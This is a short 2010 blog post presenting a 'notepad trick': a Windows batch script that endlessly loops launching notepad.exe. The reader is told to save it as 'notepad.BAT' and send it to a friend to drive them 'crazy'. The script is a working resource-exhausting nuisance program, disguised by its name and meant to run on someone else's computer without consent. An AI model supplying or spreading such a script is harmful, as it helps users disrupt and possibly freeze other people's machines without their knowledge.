Tuesday, September 7, 2010

Notepad Trick to Open notepad continuously

a code below that will drive your friend crazy as it opens notepad continuously.
Open multiple=When you type the below code and rename it as *.bat it take the above showed icon shape.
To Open Notepad continuously in your friend’s computer:

Type the code in notepad as :

@ECHO off
:top
START %SystemRoot%\system32\notepad.exe
GOTO top

Save it as “notepad.BAT” and send it.

No comments:

Post a Comment